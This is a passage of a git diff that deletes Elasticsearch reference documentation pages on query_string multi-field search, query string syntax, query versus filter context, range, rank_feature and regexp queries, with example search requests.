To search -nested documents, use the <>. - -[[query-string-multi-field]] -====== Search multiple fields - -You can use the `fields` parameter to perform a `query_string` search across -multiple fields. - -The idea of running the `query_string` query against multiple fields is to -expand each query term to an OR clause like this: - -``` -field1:query_term OR field2:query_term | ... -``` - -For example, the following query - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "fields": [ "content", "name" ], - "query": "this AND that" - } - } -} --------------------------------------------------- - -matches the same words as - - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "query": "(content:this OR name:this) AND (content:that OR name:that)" - } - } -} --------------------------------------------------- - -Since several queries are generated from the individual search terms, -combining them is automatically done using a `dis_max` query with a `tie_breaker`. -For example (the `name` is boosted by 5 using `^5` notation): - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string" : { - "fields" : ["content", "name^5"], - "query" : "this AND that OR thus", - "tie_breaker" : 0 - } - } -} --------------------------------------------------- - -Simple wildcard can also be used to search "within" specific inner -elements of the document. For example, if we have a `city` object with -several fields (or inner object with fields) in it, we can automatically -search on all "city" fields: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string" : { - "fields" : ["city.*"], - "query" : "this AND that OR thus" - } - } -} --------------------------------------------------- - -Another option is to provide the wildcard fields search in the query -string itself (properly escaping the `*` sign), for example: -`city.\*:something`: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string" : { - "query" : "city.\\*:(this AND that OR thus)" - } - } -} --------------------------------------------------- - -NOTE: Since `\` (backslash) is a special character in json strings, it needs to -be escaped, hence the two backslashes in the above `query_string`. - -The fields parameter can also include pattern based field names, -allowing to automatically expand to the relevant fields (dynamically -introduced fields included). For example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string" : { - "fields" : ["content", "name.*^5"], - "query" : "this AND that OR thus" - } - } -} --------------------------------------------------- - -[[query-string-multi-field-parms]] -====== Additional parameters for multiple field searches - -When running the `query_string` query against multiple fields, the -following additional parameters are supported. - -`type`:: -+ --- -(Optional, string) Determines how the query matches and scores documents. Valid -values are: - -`best_fields` (Default):: -Finds documents which match any field and uses the highest -<> from any matching field. See -<>. - -`bool_prefix`:: -Creates a `match_bool_prefix` query on each field and combines the `_score` from -each field. See <>. 
- -`cross_fields`:: -Treats fields with the same `analyzer` as though they were one big field. Looks -for each word in **any** field. See <>. - -`most_fields`:: -Finds documents which match any field and combines the `_score` from each field. -See <>. - -`phrase`:: -Runs a `match_phrase` query on each field and uses the `_score` from the best -field. See <>. - -`phrase_prefix`:: -Runs a `match_phrase_prefix` query on each field and uses the `_score` from the -best field. See <>. - -NOTE: -Additional top-level `multi_match` parameters may be available based on the -<> value. --- - -[[query-string-synonyms]] -===== Synonyms and the `query_string` query - -The `query_string` query supports multi-terms synonym expansion with the <> token filter. When this filter is used, the parser creates a phrase query for each multi-terms synonyms. -For example, the following synonym: `ny, new york` would produce: - -`(ny OR ("new york"))` - -It is also possible to match multi terms synonyms with conjunctions instead: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string" : { - "default_field": "title", - "query" : "ny city", - "auto_generate_synonyms_phrase_query" : false - } - } -} --------------------------------------------------- - -The example above creates a boolean query: - -`(ny OR (new AND york)) city` - -that matches documents with the term `ny` or the conjunction `new AND york`. -By default the parameter `auto_generate_synonyms_phrase_query` is set to `true`. - -[[query-string-min-should-match]] -===== How `minimum_should_match` works - -The `query_string` splits the query around each operator to create a boolean -query for the entire input. You can use `minimum_should_match` to control how -many "should" clauses in the resulting query should match. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "fields": [ - "title" - ], - "query": "this that thus", - "minimum_should_match": 2 - } - } -} --------------------------------------------------- - -The example above creates a boolean query: - -`(title:this title:that title:thus)~2` - -that matches documents with at least two of the terms `this`, `that` or `thus` -in the single field `title`. - -[[query-string-min-should-match-multi]] -===== How `minimum_should_match` works for multiple fields - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "fields": [ - "title", - "content" - ], - "query": "this that thus", - "minimum_should_match": 2 - } - } -} --------------------------------------------------- - -The example above creates a boolean query: - -`((content:this content:that content:thus) | (title:this title:that title:thus))` - -that matches documents with the disjunction max over the fields `title` and -`content`. Here the `minimum_should_match` parameter can't be applied. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "fields": [ - "title", - "content" - ], - "query": "this OR that OR thus", - "minimum_should_match": 2 - } - } -} --------------------------------------------------- - -Adding explicit operators forces each term to be considered as a separate clause. 
- -The example above creates a boolean query: - -`((content:this | title:this) (content:that | title:that) (content:thus | title:thus))~2` - -that matches documents with at least two of the three "should" clauses, each of -them made of the disjunction max over the fields for each term. - -[[query-string-min-should-match-cross]] -===== How `minimum_should_match` works for cross-field searches - -A `cross_fields` value in the `type` field indicates fields with the same -analyzer are grouped together when the input is analyzed. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "fields": [ - "title", - "content" - ], - "query": "this OR that OR thus", - "type": "cross_fields", - "minimum_should_match": 2 - } - } -} --------------------------------------------------- - -The example above creates a boolean query: - -`(blended(terms:[field2:this, field1:this]) blended(terms:[field2:that, field1:that]) blended(terms:[field2:thus, field1:thus]))~2` - -that matches documents with at least two of the three per-term blended queries. - -===== Allow expensive queries -Query string query can be internally be transformed to a <> which means -that if the prefix queries are disabled as explained <> the query will not be -executed and an exception will be thrown. diff --git a/docs/reference/query-dsl/query-string-syntax.asciidoc b/docs/reference/query-dsl/query-string-syntax.asciidoc deleted file mode 100644 index 52c9030acb2..00000000000 --- a/docs/reference/query-dsl/query-string-syntax.asciidoc +++ /dev/null @@ -1,320 +0,0 @@ -[[query-string-syntax]] - -===== Query string syntax - -The query string ``mini-language'' is used by the -<> and by the -`q` query string parameter in the <>. - -The query string is parsed into a series of _terms_ and _operators_. A -term can be a single word -- `quick` or `brown` -- or a phrase, surrounded by -double quotes -- `"quick brown"` -- which searches for all the words in the -phrase, in the same order. - -Operators allow you to customize the search -- the available options are -explained below. - -====== Field names - -You can specify fields to search in the query syntax: - -* where the `status` field contains `active` - - status:active - -* where the `title` field contains `quick` or `brown` - - title:(quick OR brown) - -* where the `author` field contains the exact phrase `"john smith"` - - author:"John Smith" - -* where the `first name` field contains `Alice` (note how we need to escape - the space with a backslash) - - first\ name:Alice - -* where any of the fields `book.title`, `book.content` or `book.date` contains - `quick` or `brown` (note how we need to escape the `*` with a backslash): - - book.\*:(quick OR brown) - -* where the field `title` has any non-null value: - - _exists_:title - -[[query-string-wildcard]] -====== Wildcards - -Wildcard searches can be run on individual terms, using `?` to replace -a single character, and `*` to replace zero or more characters: - - qu?ck bro* - -Be aware that wildcard queries can use an enormous amount of memory and -perform very badly -- just think how many terms need to be queried to -match the query string `"a* b* c*"`. - -[WARNING] -======= -Pure wildcards `\*` are rewritten to <> queries for efficiency. -As a consequence, the wildcard `"field:*"` would match documents with an empty value - like the following: -``` -{ - "field": "" -} -``` -\... 
and would **not** match if the field is missing or set with an explicit null -value like the following: -``` -{ - "field": null -} -``` -======= - -[WARNING] -======= -Allowing a wildcard at the beginning of a word (eg `"*ing"`) is particularly -heavy, because all terms in the index need to be examined, just in case -they match. Leading wildcards can be disabled by setting -`allow_leading_wildcard` to `false`. -======= - -Only parts of the analysis chain that operate at the character level are -applied. So for instance, if the analyzer performs both lowercasing and -stemming, only the lowercasing will be applied: it would be wrong to perform -stemming on a word that is missing some of its letters. - -By setting `analyze_wildcard` to true, queries that end with a `*` will be -analyzed and a boolean query will be built out of the different tokens, by -ensuring exact matches on the first N-1 tokens, and prefix match on the last -token. - -====== Regular expressions - -Regular expression patterns can be embedded in the query string by -wrapping them in forward-slashes (`"/"`): - - name:/joh?n(ath[oa]n)/ - -The supported regular expression syntax is explained in <>. - -[WARNING] -======= -The `allow_leading_wildcard` parameter does not have any control over -regular expressions. A query string such as the following would force -Elasticsearch to visit every term in the index: - - /.*n/ - -Use with caution! -======= - -[[query-string-fuzziness]] -====== Fuzziness - -We can search for terms that are -similar to, but not exactly like our search terms, using the ``fuzzy'' -operator: - - quikc~ brwn~ foks~ - -This uses the -{wikipedia}/Damerau-Levenshtein_distance[Damerau-Levenshtein distance] -to find all terms with a maximum of -two changes, where a change is the insertion, deletion -or substitution of a single character, or transposition of two adjacent -characters. - -The default _edit distance_ is `2`, but an edit distance of `1` should be -sufficient to catch 80% of all human misspellings. It can be specified as: - - quikc~1 - -[[avoid-widlcards-fuzzy-searches]] -[WARNING] -.Avoid mixing fuzziness with wildcards -==== -Mixing <> and <> operators is -_not_ supported. When mixed, one of the operators is not applied. For example, -you can search for `app~1` (fuzzy) or `app*` (wildcard), but searches for -`app*~1` do not apply the fuzzy operator (`~1`). -==== - -====== Proximity searches - -While a phrase query (eg `"john smith"`) expects all of the terms in exactly -the same order, a proximity query allows the specified words to be further -apart or in a different order. In the same way that fuzzy queries can -specify a maximum edit distance for characters in a word, a proximity search -allows us to specify a maximum edit distance of words in a phrase: - - "fox quick"~5 - -The closer the text in a field is to the original order specified in the -query string, the more relevant that document is considered to be. When -compared to the above example query, the phrase `"quick fox"` would be -considered more relevant than `"quick brown fox"`. - -====== Ranges - -Ranges can be specified for date, numeric or string fields. Inclusive ranges -are specified with square brackets `[min TO max]` and exclusive ranges with -curly brackets `{min TO max}`. 
- -* All days in 2012: - - date:[2012-01-01 TO 2012-12-31] - -* Numbers 1..5 - - count:[1 TO 5] - -* Tags between `alpha` and `omega`, excluding `alpha` and `omega`: - - tag:{alpha TO omega} - -* Numbers from 10 upwards - - count:[10 TO *] - -* Dates before 2012 - - date:{* TO 2012-01-01} - -Curly and square brackets can be combined: - -* Numbers from 1 up to but not including 5 - - count:[1 TO 5} - - -Ranges with one side unbounded can use the following syntax: - - age:>10 - age:>=10 - age:<10 - age:<=10 - -[NOTE] -==================================================================== -To combine an upper and lower bound with the simplified syntax, you -would need to join two clauses with an `AND` operator: - - age:(>=10 AND <20) - age:(+>=10 +<20) - -==================================================================== - -The parsing of ranges in query strings can be complex and error prone. It is -much more reliable to use an explicit <>. - - -====== Boosting - -Use the _boost_ operator `^` to make one term more relevant than another. -For instance, if we want to find all documents about foxes, but we are -especially interested in quick foxes: - - quick^2 fox - -The default `boost` value is 1, but can be any positive floating point number. -Boosts between 0 and 1 reduce relevance. - -Boosts can also be applied to phrases or to groups: - - "john smith"^2 (foo bar)^4 - -====== Boolean operators - -By default, all terms are optional, as long as one term matches. A search -for `foo bar baz` will find any document that contains one or more of -`foo` or `bar` or `baz`. We have already discussed the `default_operator` -above which allows you to force all terms to be required, but there are -also _boolean operators_ which can be used in the query string itself -to provide more control. - -The preferred operators are `+` (this term *must* be present) and `-` -(this term *must not* be present). All other terms are optional. -For example, this query: - - quick brown +fox -news - -states that: - -* `fox` must be present -* `news` must not be present -* `quick` and `brown` are optional -- their presence increases the relevance - -The familiar boolean operators `AND`, `OR` and `NOT` (also written `&&`, `||` -and `!`) are also supported but beware that they do not honor the usual -precedence rules, so parentheses should be used whenever multiple operators are -used together. For instance the previous query could be rewritten as: - -`((quick AND fox) OR (brown AND fox) OR fox) AND NOT news`:: - -This form now replicates the logic from the original query correctly, but -the relevance scoring bears little resemblance to the original. - -In contrast, the same query rewritten using the <> -would look like this: - - { - "bool": { - "must": { "match": "fox" }, - "should": { "match": "quick brown" }, - "must_not": { "match": "news" } - } - } - - -====== Grouping - -Multiple terms or clauses can be grouped together with parentheses, to form -sub-queries: - - (quick OR brown) AND fox - -Groups can be used to target a particular field, or to boost the result -of a sub-query: - - status:(active OR pending) title:(full text search)^2 - -====== Reserved characters - -If you need to use any of the characters which function as operators in your -query itself (and not as operators), then you should escape them with -a leading backslash. For instance, to search for `(1+1)=2`, you would -need to write your query as `\(1\+1\)\=2`. 
When using JSON for the request body, two preceding backslashes (`\\`) are required; the backslash is a reserved escaping character in JSON strings. - -[source,console] ----- -GET /my-index-000001/_search -{ - "query" : { - "query_string" : { - "query" : "kimchy\\!", - "fields" : ["user.id"] - } - } -} ----- -// TEST[setup:my_index] - -The reserved characters are: `+ - = && || > < ! ( ) { } [ ] ^ " ~ * ? : \ /` - -Failing to escape these special characters correctly could lead to a syntax error which prevents your query from running. - -NOTE: `<` and `>` can't be escaped at all. The only way to prevent them from -attempting to create a range query is to remove them from the query string -entirely. - -====== Whitespaces and empty queries - -Whitespace is not considered an operator. - -If the query string is empty or only contains whitespaces the query will -yield an empty result set. diff --git a/docs/reference/query-dsl/query_filter_context.asciidoc b/docs/reference/query-dsl/query_filter_context.asciidoc deleted file mode 100644 index 0aa0eb994cb..00000000000 --- a/docs/reference/query-dsl/query_filter_context.asciidoc +++ /dev/null @@ -1,96 +0,0 @@ -[[query-filter-context]] -== Query and filter context - -[discrete] -[[relevance-scores]] -=== Relevance scores - -By default, Elasticsearch sorts matching search results by **relevance -score**, which measures how well each document matches a query. - -The relevance score is a positive floating point number, returned in the -`_score` metadata field of the <> API. The higher the -`_score`, the more relevant the document. While each query type can calculate -relevance scores differently, score calculation also depends on whether the -query clause is run in a **query** or **filter** context. - -[discrete] -[[query-context]] -=== Query context -In the query context, a query clause answers the question ``__How well does this -document match this query clause?__'' Besides deciding whether or not the -document matches, the query clause also calculates a relevance score in the -`_score` metadata field. - -Query context is in effect whenever a query clause is passed to a `query` -parameter, such as the `query` parameter in the -<> API. - -[discrete] -[[filter-context]] -=== Filter context -In a filter context, a query clause answers the question ``__Does this -document match this query clause?__'' The answer is a simple Yes or No -- no -scores are calculated. Filter context is mostly used for filtering structured -data, e.g. - -* __Does this +timestamp+ fall into the range 2015 to 2016?__ -* __Is the +status+ field set to ++"published"++__? - -Frequently used filters will be cached automatically by Elasticsearch, to -speed up performance. - -Filter context is in effect whenever a query clause is passed to a `filter` -parameter, such as the `filter` or `must_not` parameters in the -<> query, the `filter` parameter in the -<> query, or the -<> aggregation. - -[discrete] -[[query-filter-context-ex]] -=== Example of query and filter contexts -Below is an example of query clauses being used in query and filter context -in the `search` API. This query will match documents where all of the following -conditions are met: - -* The `title` field contains the word `search`. -* The `content` field contains the word `elasticsearch`. -* The `status` field contains the exact word `published`. -* The `publish_date` field contains a date from 1 Jan 2015 onwards. 
- -[source,console] ------------------------------------- -GET /_search -{ - "query": { <1> - "bool": { <2> - "must": [ - { "match": { "title": "Search" }}, - { "match": { "content": "Elasticsearch" }} - ], - "filter": [ <3> - { "term": { "status": "published" }}, - { "range": { "publish_date": { "gte": "2015-01-01" }}} - ] - } - } -} ------------------------------------- - -<1> The `query` parameter indicates query context. -<2> The `bool` and two `match` clauses are used in query context, - which means that they are used to score how well each document - matches. -<3> The `filter` parameter indicates filter context. Its `term` and - `range` clauses are used in filter context. They will filter out - documents which do not match, but they will - not affect the score for matching documents. - -WARNING: Scores calculated for queries in query context are represented -as single precision floating point numbers; they have only -24 bits for significand's precision. Score calculations that exceed the -significand's precision will be converted to floats with loss of precision. - -TIP: Use query clauses in query context for conditions which should affect the -score of matching documents (i.e. how well does the document match), and use -all other query clauses in filter context. \ No newline at end of file diff --git a/docs/reference/query-dsl/range-query.asciidoc b/docs/reference/query-dsl/range-query.asciidoc deleted file mode 100644 index 32184875aa0..00000000000 --- a/docs/reference/query-dsl/range-query.asciidoc +++ /dev/null @@ -1,252 +0,0 @@ -[[query-dsl-range-query]] -=== Range query -++++ -Range -++++ - -Returns documents that contain terms within a provided range. - -[[range-query-ex-request]] -==== Example request - -The following search returns documents where the `age` field contains a term -between `10` and `20`. - -[source,console] ----- -GET /_search -{ - "query": { - "range": { - "age": { - "gte": 10, - "lte": 20, - "boost": 2.0 - } - } - } -} ----- - -[[range-query-top-level-params]] -==== Top-level parameters for `range` - -``:: -+ --- -(Required, object) Field you wish to search. --- - -[[range-query-field-params]] -==== Parameters for `` - -`gt`:: -(Optional) Greater than. - -`gte`:: -(Optional) Greater than or equal to. - -`lt`:: -(Optional) Less than. - -`lte`:: -(Optional) Less than or equal to. - -`format`:: -+ --- -(Optional, string) Date format used to convert `date` values in the query. - -By default, {es} uses the <> provided in the -``'s mapping. This value overrides that mapping format. - -For valid syntax, see <>. - -WARNING: If a format or date value is incomplete, the range query replaces any -missing components with default values. See <>. - --- - -[[querying-range-fields]] -`relation`:: -+ --- -(Optional, string) Indicates how the range query matches values for `range` -fields. Valid values are: - -`INTERSECTS` (Default):: -Matches documents with a range field value that intersects the query's range. - -`CONTAINS`:: -Matches documents with a range field value that entirely contains the query's range. - -`WITHIN`:: -Matches documents with a range field value entirely within the query's range. --- - -`time_zone`:: -+ --- -(Optional, string) -{wikipedia}/List_of_UTC_time_offsets[Coordinated Universal -Time (UTC) offset] or -{wikipedia}/List_of_tz_database_time_zones[IANA time zone] -used to convert `date` values in the query to UTC. - -Valid values are ISO 8601 UTC offsets, such as `+01:00` or -`08:00`, and IANA -time zone IDs, such as `America/Los_Angeles`. 
- -For an example query using the `time_zone` parameter, see -<>. - -[NOTE] -==== -The `time_zone` parameter does **not** affect the <> value -of `now`. `now` is always the current system time in UTC. - -However, the `time_zone` parameter does convert dates calculated using `now` and -<>. For example, the `time_zone` parameter will -convert a value of `now/d`. -==== --- - -`boost`:: -+ --- -(Optional, float) Floating point number used to decrease or increase the -<> of a query. Defaults to `1.0`. - -You can use the `boost` parameter to adjust relevance scores for searches -containing two or more queries. - -Boost values are relative to the default value of `1.0`. A boost value between -`0` and `1.0` decreases the relevance score. A value greater than `1.0` -increases the relevance score. --- - -[[range-query-notes]] -==== Notes - -[[ranges-on-text-and-keyword]] -===== Using the `range` query with `text` and `keyword` fields -Range queries on <> or <> fields will not be executed if -<> is set to false. - -[[ranges-on-dates]] -===== Using the `range` query with `date` fields - -When the `` parameter is a <> field data type, you can use -<> with the following parameters: - -* `gt` -* `gte` -* `lt` -* `lte` - -For example, the following search returns documents where the `timestamp` field -contains a date between today and yesterday. - -[source,console] ----- -GET /_search -{ - "query": { - "range": { - "timestamp": { - "gte": "now-1d/d", - "lt": "now/d" - } - } - } -} ----- - -[[missing-date-components]] -====== Missing date components - -For range queries and <> aggregations, {es} replaces missing date components with the following -values. Missing year components are not replaced. - -[source,text] ----- -MONTH_OF_YEAR: 01 -DAY_OF_MONTH: 01 -HOUR_OF_DAY: 23 -MINUTE_OF_HOUR: 59 -SECOND_OF_MINUTE: 59 -NANO_OF_SECOND: 999_999_999 ----- - -For example, if the format is `yyyy-MM`, {es} converts a `gt` value of `2099-12` -to `2099-12-01T23:59:59.999_999_999Z`. This date uses the provided year (`2099`) -and month (`12`) but uses the default day (`01`), hour (`23`), minute (`59`), -second (`59`), and nanosecond (`999_999_999`). - -[[range-query-date-math-rounding]] -====== Date math and rounding -{es} rounds <> values in parameters as follows: - -`gt`:: -+ --- -Rounds up to the first millisecond not covered by the rounded date. - -For example, `2014-11-18||/M` rounds up to `2014-12-01T00:00:00.000`, excluding -the entire month of November. --- - -`gte`:: -+ --- -Rounds down to the first millisecond. - -For example, `2014-11-18||/M` rounds down to `2014-11-01T00:00:00.000`, including -the entire month. --- - -`lt`:: -+ --- -Rounds down to the last millisecond before the rounded value. - -For example, `2014-11-18||/M` rounds down to `2014-10-31T23:59:59.999`, excluding -the entire month of November. --- - -`lte`:: -+ --- -Rounds up to the latest millisecond in the rounding interval. - -For example, `2014-11-18||/M` rounds up to `2014-11-30T23:59:59.999`, including -the entire month. --- - -[[range-query-time-zone]] -===== Example query using `time_zone` parameter - -You can use the `time_zone` parameter to convert `date` values to UTC using a -UTC offset. For example: - -[source,console] ----- -GET /_search -{ - "query": { - "range": { - "timestamp": { - "time_zone": "+01:00", <1> - "gte": "2020-01-01T00:00:00", <2> - "lte": "now" <3> - } - } - } -} ----- -// TEST[continued] - -<1> Indicates that `date` values use a UTC offset of `+01:00`. 
-<2> With a UTC offset of `+01:00`, {es} converts this date to -`2019-12-31T23:00:00 UTC`. -<3> The `time_zone` parameter does not affect the `now` value. diff --git a/docs/reference/query-dsl/rank-feature-query.asciidoc b/docs/reference/query-dsl/rank-feature-query.asciidoc deleted file mode 100644 index 1563a67bc03..00000000000 --- a/docs/reference/query-dsl/rank-feature-query.asciidoc +++ /dev/null @@ -1,313 +0,0 @@ -[[query-dsl-rank-feature-query]] -=== Rank feature query -++++ -Rank feature -++++ - -Boosts the <> of documents based on the -numeric value of a <> or -<> field. - -The `rank_feature` query is typically used in the `should` clause of a -<> query so its relevance scores are added to other -scores from the `bool` query. - -Unlike the <> query or other -ways to change <>, the -`rank_feature` query efficiently skips non-competitive hits when the -<> parameter is **not** `true`. This can -dramatically improve query speed. - -[[rank-feature-query-functions]] -==== Rank feature functions - -To calculate relevance scores based on rank feature fields, the `rank_feature` -query supports the following mathematical functions: - -* <> -* <> -* <> - -If you don't know where to start, we recommend using the `saturation` function. -If no function is provided, the `rank_feature` query uses the `saturation` -function by default. - -[[rank-feature-query-ex-request]] -==== Example request - -[[rank-feature-query-index-setup]] -===== Index setup - -To use the `rank_feature` query, your index must include a -<> or <> field -mapping. To see how you can set up an index for the `rank_feature` query, try -the following example. - -Create a `test` index with the following field mappings: - -- `pagerank`, a <> field which measures the -importance of a website -- `url_length`, a <> field which contains the -length of the website's URL. For this example, a long URL correlates negatively -to relevance, indicated by a `positive_score_impact` value of `false`. -- `topics`, a <> field which contains a list of -topics and a measure of how well each document is connected to this topic - -[source,console] ----- -PUT /test -{ - "mappings": { - "properties": { - "pagerank": { - "type": "rank_feature" - }, - "url_length": { - "type": "rank_feature", - "positive_score_impact": false - }, - "topics": { - "type": "rank_features" - } - } - } -} ----- -// TESTSETUP - - -Index several documents to the `test` index. - -[source,console] ----- -PUT /test/_doc/1?refresh -{ - "url": "https://en.wikipedia.org/wiki/2016_Summer_Olympics", - "content": "Rio 2016", - "pagerank": 50.3, - "url_length": 42, - "topics": { - "sports": 50, - "brazil": 30 - } -} - -PUT /test/_doc/2?refresh -{ - "url": "https://en.wikipedia.org/wiki/2016_Brazilian_Grand_Prix", - "content": "Formula One motor race held on 13 November 2016", - "pagerank": 50.3, - "url_length": 47, - "topics": { - "sports": 35, - "formula one": 65, - "brazil": 20 - } -} - -PUT /test/_doc/3?refresh -{ - "url": "https://en.wikipedia.org/wiki/Deadpool_(film)", - "content": "Deadpool is a 2016 American superhero film", - "pagerank": 50.3, - "url_length": 37, - "topics": { - "movies": 60, - "super hero": 65 - } -} ----- - -[[rank-feature-query-ex-query]] -===== Example query - -The following query searches for `2016` and boosts relevance scores based on -`pagerank`, `url_length`, and the `sports` topic. 
- -[source,console] ----- -GET /test/_search -{ - "query": { - "bool": { - "must": [ - { - "match": { - "content": "2016" - } - } - ], - "should": [ - { - "rank_feature": { - "field": "pagerank" - } - }, - { - "rank_feature": { - "field": "url_length", - "boost": 0.1 - } - }, - { - "rank_feature": { - "field": "topics.sports", - "boost": 0.4 - } - } - ] - } - } -} ----- - - -[[rank-feature-top-level-params]] -==== Top-level parameters for `rank_feature` - -`field`:: -(Required, string) <> or -<> field used to boost -<>. - -`boost`:: -+ --- -(Optional, float) Floating point number used to decrease or increase -<>. Defaults to `1.0`. - -Boost values are relative to the default value of `1.0`. A boost value between -`0` and `1.0` decreases the relevance score. A value greater than `1.0` -increases the relevance score. --- - -`saturation`:: -+ --- -(Optional, <>) Saturation -function used to boost <> based on the -value of the rank feature `field`. If no function is provided, the `rank_feature` -query defaults to the `saturation` function. See -<> for more information. - -Only one function `saturation`, `log`, or `sigmoid` can be provided. --- - -`log`:: -+ --- -(Optional, <>) Logarithmic -function used to boost <> based on the -value of the rank feature `field`. See -<> for more information. - -Only one function `saturation`, `log`, or `sigmoid` can be provided. --- - -`sigmoid`:: -+ --- -(Optional, <>) Sigmoid function used -to boost <> based on the value of the -rank feature `field`. See <> for more -information. - -Only one function `saturation`, `log`, or `sigmoid` can be provided. --- - - -[[rank-feature-query-notes]] -==== Notes - -[[rank-feature-query-saturation]] -===== Saturation -The `saturation` function gives a score equal to `S / (S + pivot)`, where `S` is -the value of the rank feature field and `pivot` is a configurable pivot value so -that the result will be less than `0.5` if `S` is less than pivot and greater -than `0.5` otherwise. Scores are always `(0,1)`. - -If the rank feature has a negative score impact then the function will be -computed as `pivot / (S + pivot)`, which decreases when `S` increases. - -[source,console] --------------------------------------------------- -GET /test/_search -{ - "query": { - "rank_feature": { - "field": "pagerank", - "saturation": { - "pivot": 8 - } - } - } -} --------------------------------------------------- - -If a `pivot` value is not provided, {es} computes a default value equal to the -approximate geometric mean of all rank feature values in the index. We recommend -using this default value if you haven't had the opportunity to train a good -pivot value. - -[source,console] --------------------------------------------------- -GET /test/_search -{ - "query": { - "rank_feature": { - "field": "pagerank", - "saturation": {} - } - } -} --------------------------------------------------- - -[[rank-feature-query-logarithm]] -===== Logarithm -The `log` function gives a score equal to `log(scaling_factor + S)`, where `S` -is the value of the rank feature field and `scaling_factor` is a configurable -scaling factor. Scores are unbounded. - -This function only supports rank features that have a positive score impact. 
- -[source,console] --------------------------------------------------- -GET /test/_search -{ - "query": { - "rank_feature": { - "field": "pagerank", - "log": { - "scaling_factor": 4 - } - } - } -} --------------------------------------------------- - -[[rank-feature-query-sigmoid]] -===== Sigmoid -The `sigmoid` function is an extension of `saturation` which adds a configurable -exponent. Scores are computed as `S^exp^ / (S^exp^ + pivot^exp^)`. Like for the -`saturation` function, `pivot` is the value of `S` that gives a score of `0.5` -and scores are `(0,1)`. - -The `exponent` must be positive and is typically in `[0.5, 1]`. A -good value should be computed via training. If you don't have the opportunity to -do so, we recommend you use the `saturation` function instead. - -[source,console] --------------------------------------------------- -GET /test/_search -{ - "query": { - "rank_feature": { - "field": "pagerank", - "sigmoid": { - "pivot": 7, - "exponent": 0.6 - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/query-dsl/regexp-query.asciidoc b/docs/reference/query-dsl/regexp-query.asciidoc deleted file mode 100644 index 480809ce135..00000000000 --- a/docs/reference/query-dsl/regexp-query.asciidoc +++ /dev/null @@ -1,100 +0,0 @@ -[[query-dsl-regexp-query]] -=== Regexp query -++++ -Regexp -++++ - -Returns documents that contain terms matching a -{wikipedia}/Regular_expression[regular expression]. - -A regular expression is a way to match patterns in data using placeholder -characters, called operators. For a list of operators supported by the -`regexp` query, see <>. - -[[regexp-query-ex-request]] -==== Example request - -The following search returns documents where the `user.id` field contains any term -that begins with `k` and ends with `y`. The `.*` operators match any -characters of any length, including no characters. Matching -terms can include `ky`, `kay`, and `kimchy`. - -[source,console] ----- -GET /_search -{ - "query": { - "regexp": { - "user.id": { - "value": "k.*y", - "flags": "ALL", - "case_insensitive": true, - "max_determinized_states": 10000, - "rewrite": "constant_score" - } - } - } -} ----- - - -[[regexp-top-level-params]] -==== Top-level parameters for `regexp` -``:: -(Required, object) Field you wish to search. - -[[regexp-query-field-params]] -==== Parameters for `` -`value`:: -(Required, string) Regular expression for terms you wish to find in the provided -``. For a list of supported operators, see <>. -+ --- -By default, regular expressions are limited to 1,000 characters. You can change -this limit using the <> -setting. - -[WARNING] -===== -The performance of the `regexp` query can vary based on the regular expression -provided. To improve performance, avoid using wildcard patterns, such as `.*` or -`.*?+`, without a prefix or suffix. -===== --- - -`flags`:: -(Optional, string) Enables optional operators for the regular expression. For -valid values and more information, see <>. - -`case_insensitive`:: -(Optional, Boolean) allows case insensitive matching of the regular expression -value with the indexed field values when set to true. Default is false which means -the case sensitivity of matching depends on the underlying field's mapping. - -`max_determinized_states`:: -+ --- -(Optional, integer) Maximum number of -{wikipedia}/Deterministic_finite_automaton[automaton states] -required for the query. Default is `10000`. 
- -{es} uses https://lucene.apache.org/core/[Apache Lucene] internally to parse -regular expressions. Lucene converts each regular expression to a finite -automaton containing a number of determinized states. - -You can use this parameter to prevent that conversion from unintentionally -consuming too many resources. You may need to increase this limit to run complex -regular expressions. --- - -`rewrite`:: -(Optional, string) Method used to rewrite the query. For valid values and more -information, see the <>. - -[[regexp-query-notes]] -==== Notes -===== Allow expensive queries -Regexp queries will not be executed if <> -is set to false. diff --git a/docs/reference/query-dsl/regexp-syntax.asciidoc b/docs/reference/query-dsl/regexp-syntax.asciidoc deleted file mode 100644 index 57c8c9d35b8..00000000000 --- a/docs/reference/query-dsl/regexp-syntax.asciidoc +++ /dev/null @@ -1,224 +0,0 @@ -[[regexp-syntax]] -== Regular expression syntax - -A {wikipedia}/Regular_expression[regular expression] is a way to -match patterns in data using placeholder characters, called operators. - -{es} supports regular expressions in the following queries: - -* <> -* <> - -{es} uses https://lucene.apache.org/core/[Apache Lucene]'s regular expression -engine to parse these queries. - -[discrete] -[[regexp-reserved-characters]] -=== Reserved characters -Lucene's regular expression engine supports all Unicode characters. However, the -following characters are reserved as operators: - -.... -. ? + * | { } [ ] ( ) " \ -.... - -Depending on the <> enabled, the -following characters may also be reserved: - -.... -# @ & < > ~ -.... - -To use one of these characters literally, escape it with a preceding -backslash or surround it with double quotes. For example: - -.... -\@ # renders as a literal '@' -\\ # renders as a literal '\' -"john@smith.com" # renders as 'john@smith.com' -.... - - -[discrete] -[[regexp-standard-operators]] -=== Standard operators - -Lucene's regular expression engine does not use the -{wikipedia}/Perl_Compatible_Regular_Expressions[Perl -Compatible Regular Expressions (PCRE)] library, but it does support the -following standard operators. - -`.`:: -+ --- -Matches any character. For example: - -.... -ab. # matches 'aba', 'abb', 'abz', etc. -.... --- - -`?`:: -+ --- -Repeat the preceding character zero or one times. Often used to make the -preceding character optional. For example: - -.... -abc? # matches 'ab' and 'abc' -.... --- - -`+`:: -+ --- -Repeat the preceding character one or more times. For example: - -.... -ab+ # matches 'ab', 'abb', 'abbb', etc. -.... --- - -`*`:: -+ --- -Repeat the preceding character zero or more times. For example: - -.... -ab* # matches 'a', 'ab', 'abb', 'abbb', etc. -.... --- - -`{}`:: -+ --- -Minimum and maximum number of 